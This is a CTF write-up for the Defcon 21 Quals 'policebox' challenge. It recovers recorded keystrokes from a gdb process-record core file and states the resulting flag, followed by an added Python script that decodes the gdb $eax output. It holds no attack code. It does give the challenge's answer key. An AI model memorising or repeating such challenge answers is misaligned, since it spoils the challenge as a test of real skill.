<img class="txc-image" height="539" id="tx_entry_77297_" src="http://cfile28.uf.tistory.com/image/2653C04F51C0031B3724FC" width="769" /></div>
<div style="color: #333333; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
After some debugging, the exploit worked.</div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<img class="txc-image" height="115" id="tx_entry_32839_" src="http://cfile1.uf.tistory.com/image/26019A4151C1AEE814762C" width="478" /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="clear: none; color: #333333; float: none; font-family: 돋움; font-size: 12px; line-height: 18px;">
<br /></div>
Team. Alternatives<br />
<br />
Defcon 21 CTF Quals - policebox writeup (2013-06-18)<br />
<br />
Two files are given below:<br />
<br />
policebox: ELF 32-bit LSB executables, Intel 80386<br />
core: ELF 32-bit LSB core file Intel 80386<br />
<br />
and the core file contains a saved gdb execution log (a process record).<br />
<br />
With gdb, a simple solution can be derived as follows:<br />
<br />
<br />
zemisolsol@ubuntu:~$ gdb ./policebox -q<br />
Reading symbols from /home/zemisolsol/policebox...(no debugging symbols found)...done.<br />
(gdb) record restore core<br />
[New LWP 17170]<br />
warning: .dynamic section for "/lib/i386-linux-gnu/libc.so.6" is not at the expected address (wrong library or version mismatch?)<br />
warning: .dynamic section for "/lib/ld-linux.so.2" is not at the expected address (wrong library or version mismatch?)<br />
Core was generated by `policebox'.<br />
#0 0x08048621 in main ()<br />
Restored records from core file /home/zemisolsol/core.<br />
#0 0x08048621 in main ()<br />
(gdb) b *main+123<br />
Breakpoint 1 at 0x8048699<br />
(gdb) disp/x $eax<br />
1: /x $eax = 0x1<br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x77</b><br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x30</b><br />
(gdb) c<br />
Continuing.<br />
<br />
Breakpoint 1, 0x08048699 in main ()<br />
1: /x $eax = <b>0x72</b><br />
(gdb)<br />
<div>
<br /></div>
<div>
<div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x6c</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
<div>
<br /></div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x64</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
<div>
<br /></div>
<div>
Breakpoint 1, 0x08048699 in main ()</div>
<div>
1: /x $eax = <b>0x73</b></div>
<div>
(gdb)</div>
<div>
Continuing.</div>
</div>
</div>
<div>
.</div>
<div>
.</div>
<div>
.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
So, the key is "w0rlds.w0rst.k3yl0gger!"</div>
<div>
<br /></div>
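The session above reads one keystroke byte from $eax at every hit of the breakpoint at main+123 and the key is assembled by hand. The script below is an added example (not part of the original writeup) that automates the two mechanical parts: it parses the `1: /x $eax = 0x..` display lines out of a saved gdb transcript and decodes them into the key text, and it builds the argv for a non-interactive gdb run that repeats the manual `record restore` / `break` / `display` / `continue` loop. The transcript excerpt is constructed from the values shown on the page; the `gdb_batch_command` helper is hypothetical and assumes gdb's `-batch` and `-ex` options.

```python
import re

# Constructed excerpt of the gdb session from the writeup: only the displayed
# $eax values matter, and these six are the ones visible on the page.
SAMPLE_TRANSCRIPT = """\
Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x77
(gdb) c
Continuing.

Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x30
(gdb) c
Continuing.

Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x72
(gdb) c
Continuing.

Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x6c
(gdb) c
Continuing.

Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x64
(gdb) c
Continuing.

Breakpoint 1, 0x08048699 in main ()
1: /x $eax = 0x73
(gdb) c
Continuing.
"""

# gdb prints an auto-display as "<n>: /x $eax = 0x<hex>"; the initial value
# shown right after "disp/x $eax" (0x1 in the writeup) is not a keystroke, so
# callers should skip it if their transcript starts there.
EAX_DISPLAY_RE = re.compile(r"^\d+: /x \$eax = 0x([0-9a-fA-F]+)\s*$", re.MULTILINE)


def extract_eax_values(transcript: str) -> list[int]:
    """Return every $eax value gdb displayed, in the order it was shown."""
    return [int(h, 16) for h in EAX_DISPLAY_RE.findall(transcript)]


def decode_keystrokes(values: list[int]) -> str:
    """Turn the per-breakpoint $eax bytes into the recorded key text.

    The breakpoint sits where main() has just fetched one logged keystroke,
    so each value is one printable ASCII byte; anything else means the
    breakpoint or display expression is wrong, so fail loudly.
    """
    chars = []
    for v in values:
        if not 0x20 <= v < 0x7F:
            raise ValueError(f"non-printable keystroke byte: {v:#x}")
        chars.append(chr(v))
    return "".join(chars)


def gdb_batch_command(binary: str, core: str, breakpoint: str, hits: int) -> list[str]:
    """argv for a non-interactive gdb run equivalent to the manual session.

    Hypothetical helper: it assumes gdb's -q, -batch and -ex options and
    issues 'continue' once per expected breakpoint hit.
    """
    argv = [
        "gdb", "-q", "-batch", binary,
        "-ex", f"record restore {core}",
        "-ex", f"break {breakpoint}",
        "-ex", "display/x $eax",
    ]
    argv += ["-ex", "continue"] * hits
    return argv


if __name__ == "__main__":
    recovered = decode_keystrokes(extract_eax_values(SAMPLE_TRANSCRIPT))
    print("recovered prefix:", recovered)
    print(" ".join(gdb_batch_command("./policebox", "core", "*main+123", 23)))
```

Run the gdb command it prints with the real `policebox` and `core` files, pipe the output into `extract_eax_values`, and `decode_keystrokes` yields the full key; on the six values visible in the writeup it gives the prefix `w0rlds`.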